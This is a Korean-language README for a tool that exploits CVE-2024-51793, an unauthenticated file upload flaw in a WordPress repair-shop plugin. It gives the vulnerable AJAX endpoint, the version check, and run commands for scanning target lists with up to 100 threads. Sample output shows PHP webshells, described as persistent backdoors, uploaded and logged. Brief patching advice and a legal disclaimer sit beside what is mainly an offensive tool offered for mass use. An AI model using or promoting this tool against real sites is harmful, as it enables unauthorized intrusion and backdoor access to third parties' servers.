
CVE-2024-51793을 악용하여 WordPress Computer Repair Shop 플러그인의 인증되지 않은 임의 파일 업로드 취약점을 공격하고, 대상 목록을 스캔하며, PHP 웹셸을 업로드하고, 취약한 사이트를 보고합니다.
CVE-2024-51793 익스플로잇 도구 문서 📋 개요 CVE-2024-51793은 Computer Repair Shop WordPress 플러그인(버전 3.8116 미만)에서 발견된 인증되지 않은 임의 파일 업로드 취약점입니다. 이 취약점으로 인해 공격자는 인증 없이 PHP 웹쉘을 포함한 임의의 파일을 업로드할 수 있으며, 취약한 WordPress 사이트에서 원격 코드 실행이 가능해집니다.
🚨 취약점 세부 정보 CVE ID: CVE-2024-51793
취약점 유형: 인증되지 않은 임의 파일 업로드
영향을 받는 플러그인: Computer Repair Shop WordPress Plugin
영향을 받는 버전: < 3.8116
위험 수준: 심각 (CVSS 점수: 9.8)
🔧 기술적 세부 정보
이 취약점은 플러그인의 wc_upload_file_ajax 액션 핸들러에 존재하며, 파일 유형과 사용자 인증을 제대로 검증하지 않아 인증되지 않은 공격자가 악성 파일을 서버에 직접 업로드할 수 있게 합니다.
📦 설치 및 요구 사항 사전 요구 사항 Python 3.6+
필수 패키지: requests
설치 bash
git clone cd cve-2024-51793-exploit
pip install requests
pip install -r requirements.txt 🛠️ 사용 방법 기본 사용법 bash python3 cve_2024_51793_exploit.py -l targets.txt -t 50 고급 사용법 bash
python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results
python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose 명령줄 인자 인자 약어 설명 기본값 --list -l 대상 URL이 포함된 파일 경로 (필수) - --threads -t 동시 스레드 수 50 --output -o 결과 출력 디렉터리 results 입력 파일 형식 한 줄에 하나의 URL이 있는 텍스트 파일(targets.txt)을 만듭니다:
text example.com https://vulnerable-site.com http://192.168.1.100/wordpress test-site.org/blog 🔍 작동 방식
text /wp-content/plugins/computer-repair-shop/readme.txt 2. 버전 탐지 플러그인에 "CRM WordPress Plugin"이 포함되어 있고 버전이 3.8116 미만인지 확인합니다.
text POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax 4. 웹쉘 페이로드 업로드된 웹쉘은 다음 기능을 제공합니다:
파일 업로드 기능
기본 파일 관리
지속적인 백도어 접근
📊 출력 파일 도구는 두 가지 주요 출력 파일을 생성합니다:
vulnerable_targets.txt - 확인된 취약한 URL 목록
webshells.txt - 성공적으로 업로드된 웹쉘 URL 목록
🎯 실행 예시 bash $ python3 cve_2024_51793_exploit.py -l targets.txt -t 30
╔══════════════════════════════════════════════════════════════╗
║ ║
║ CVE-2024-51793 Exploit Tool ║
║ Unauthenticated RCE in Computer Repair Shop WP Plugin ║
║ ║
╚══════════════════════════════════════════════════════════════╝
[ INFO ] Loaded 150 unique targets [ INFO ] Starting scan with 30 threads
[ SCANNING ] Checking: http://example.com/ [ VULNERABLE ] Target identified: http://example.com/ [ SUCCESS ] Shell uploaded: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php
[ SCANNING ] Checking: http://testsite.com/ [ NOT VULNERABLE ] Target: http://testsite.com/
[ COMPLETED ] Scan finished successfully 🛡️ 방어 조치 웹사이트 소유자를 위한 조치 즉시 조치:
Computer Repair Shop 플러그인을 버전 3.8116 이상으로 업데이트
업로드된 악성 파일 제거
기존 침해 여부 스캔
예방 조치:
웹 애플리케이션 방화벽(WAF) 구축
정기적인 보안 감사
파일 무결성 모니터링
보안 연구자를 위한 조치 승인된 환경에서만 사용
책임 있는 공개 절차 준수
테스트 전 적절한 권한 획득
⚠️ 법적 및 윤리적 고려 사항 이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용해야 합니다
소유하지 않은 시스템에 대한 무단 사용은 불법입니다
침투 테스트 전 항상 적절한 승인을 받으십시오
발견된 취약점에 대해 책임 있는 공개 절차를 따르십시오
🔄 유지보수 업데이트 정기적으로 다음을 확인하세요:
스크립트 업데이트 및 개선 사항
취약점 상태 변경
새로운 탐지 방법
문제 해결 일반적인 문제와 해결 방법:
연결 시간 초과: 세션 구성에서 타임아웃 값 증가
거짓 음성: 대상 URL에 접근 가능한지 확인
속도 제한: 스레드 수를 줄이고 지연 시간 추가
📞 지원 문제 및 개선 사항에 대해:
프로젝트 저장소에 이슈 생성
연락처: TG: @KtN_1990
📚 참고 자료 CVE-2024-51793 공식 항목
WordPress 플러그인 디렉터리
[보안 권고 참고 자료]
면책 조항: 이 도구는 합법적인 보안 연구 및 승인된 침투 테스트에만 사용해야 합니다. 작성자는 이 도구의 오용이나 손해에 대해 책임을 지지 않습니다.